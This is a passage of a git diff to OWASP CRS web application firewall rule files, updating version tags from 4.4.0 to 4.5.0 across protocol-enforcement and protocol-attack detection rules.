ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ @@ -686,7 +686,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" @@ -707,7 +707,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 100" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*(?:[\s\x0b]*,[\s\x0b]*(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*)*$" \ @@ -723,7 +723,7 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\* tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQBODY_PROCESSOR "!@streq JSON" \ @@ -740,7 +740,7 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ @@ -758,7 +758,7 @@ SecRule REQUEST_URI_RAW "@contains #" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ @@ -774,11 +774,11 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:1,\ @@ -793,7 +793,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ @@ -812,7 +812,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ @@ -831,7 +831,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ @@ -848,7 +848,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ @@ -865,7 +865,7 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" SecRule FILES_NAMES|FILES "@rx ['\";=]" \ @@ -882,7 +882,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ @@ -898,7 +898,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -920,7 +920,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ chain" @@ -940,15 +940,15 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BODY "@rx \x25" \ "chain" SecRule REQUEST_BODY "@validateUrlEncoding" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ "id:920272,\ phase:2,\ @@ -963,7 +963,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Accept "@eq 0" \ @@ -980,7 +980,7 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ @@ -1001,7 +1001,7 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ @@ -1022,7 +1022,7 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ @@ -1042,11 +1042,11 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ phase:1,\ @@ -1061,7 +1061,7 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ @@ -1080,7 +1080,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ @@ -1097,7 +1097,7 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ @@ -1114,7 +1114,7 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^( tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \ @@ -1132,7 +1132,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf index a0a119c..c4a4825 100644 --- a/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/@owasp_crs/REQUEST-921-PROTOCOL-ATTACK.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \ "id:921110,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -81,7 +81,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/273',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -100,7 +100,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -119,7 +119,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -137,7 +137,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -155,7 +155,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/136',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \ @@ -174,7 +174,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_URI "@rx unix:[^|]*\|" \ @@ -192,11 +192,11 @@ SecRule REQUEST_URI "@rx unix:[^|]*\|" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule ARGS_GET "@rx [\n\r]" \ "id:921151,\ phase:1,\ @@ -212,7 +212,7 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -232,11 +232,11 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?\b(?:((?:tex tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule &REQUEST_HEADERS:Range "@gt 0" \ "id:921230,\ phase:1,\ @@ -251,7 +251,7 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES "@rx ." \ @@ -265,7 +265,7 @@ SecRule ARGS_NAMES "@rx ." \ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" SecRule TX:/paramcounter_.*/ "@gt 1" \ "id:921180,\ @@ -280,7 +280,7 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ @@ -301,12 +301,12 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule ARGS_NAMES "@rx \[" \ "id:921220,\ phase:2,\ @@ -321,7 +321,7 @@ SecRule ARGS_NAMES "@rx \[" \ tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf index 